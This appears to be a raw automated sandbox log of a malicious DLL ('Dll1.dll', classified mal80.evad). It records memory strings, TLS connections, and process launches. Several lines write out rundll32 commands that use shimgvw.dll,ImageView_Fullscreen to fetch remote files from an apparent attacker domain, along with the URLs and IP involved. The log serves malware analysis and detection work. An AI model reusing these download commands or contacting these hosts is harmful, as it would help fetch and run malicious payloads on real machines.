Source: rundll32.exe, 00000006.00000002.3273575831.0000000002A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtPR
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtPg
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtQ8
Source: rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtV~
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtWk
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtag
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtd
Source: rundll32.exe, 00000005.00000002.3272308201.000000000267A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txte
Source: rundll32.exe, 00000006.00000002.3272227188.0000000002610000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtent
Source: rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtentg
Source: rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtentindowsINetCookies
Source: rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtf
Source: rundll32.exe, 00000006.00000002.3272227188.000000000261A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtft
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txthe
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtjx
Source: rundll32.exe, 00000006.00000002.3272227188.000000000261A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtm
Source: rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtp
Source: rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtr
Source: rundll32.exe, 00000005.00000002.3272220241.00000000023D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272306421.0000000002C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txts
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtz
Source: rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogI
Source: rundll32.exe, 0000000B.00000002.3272070507.0000000002767000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogtxt
Source: rundll32.exe, 00000005.00000002.3272074755.0000000000247000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogtxtB
Source: rundll32.exe, 00000006.00000002.3272073394.00000000002F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogtxtH
Source: rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3274898545.00000000056DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp$q
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp%
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp.(
Source: rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp/
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp0
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp2
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4P
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4T
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4e
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4r
Source: rundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp5A
Source: rundll32.exe, 0000000C.00000002.3272566960.00000000035DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp60
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003
Source: rundll32.exe, 00000003.00000002.2056608367.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2056574094.0000000003360000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272128849.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272263359.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3273461533.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272566960.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272431562.0000000003480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpE
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpE0
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpG
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpH
Source: rundll32.exe, 00000009.00000002.3273671925.0000000002E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpPR
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpR0
Source: rundll32.exe, 0000000C.00000002.3275204855.0000000009207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpU
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpV
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpY
Source: loaddll32.exe, 00000000.00000002.2084984797.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpaC:
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpd
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpent
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpent0
Source: rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpentindowsINetCookies
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmph
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpj
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpk
Source: rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpmp
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpmpf
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpo
Source: rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpq
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmprmh
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpryh
Source: rundll32.exe, 0000000A.00000002.3273620140.0000000003150000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272288324.0000000003430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmps
Source: rundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpt
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008B5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpz
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E970D0_2_6F9E970D
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9F44AB0_2_6F9F44AB
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E93CB0_2_6F9E93CB
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9F9BE90_2_6F9F9BE9
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E9A6C0_2_6F9E9A6C
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9F40000_2_6F9F4000
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E970D3_2_6F9E970D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F44AB3_2_6F9F44AB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E93CB3_2_6F9E93CB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F9BE93_2_6F9F9BE9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E9A6C3_2_6F9E9A6C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F40003_2_6F9F4000
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6F9E38C0 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F9E38C0 appears 45 times
Source: Dll1.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal80.evad.winDLL@20/0@2/1
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E1CFA CloseHandle,CoInitialize,CoCreateInstance,CoUninitialize,ExpandEnvironmentStringsW,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,0_2_6F9E1CFA
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: Dll1.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain
Source: Dll1.dllReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Dll1.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmainJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txtJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmpJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Dll1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Dll1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Dll1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Dll1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Dll1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Dll1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Dll1.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Dll1.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Dll1.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Dll1.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Dll1.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Dll1.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Dll1.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9FA301 push ecx; ret 0_2_6F9FA314
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9FA301 push ecx; ret 3_2_6F9FA314
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0475F2EC push 840843CEh; iretd 5_2_0475F2F1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04E0ECB6 push 825076FAh; retn 0002h9_2_04E0EDEA
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
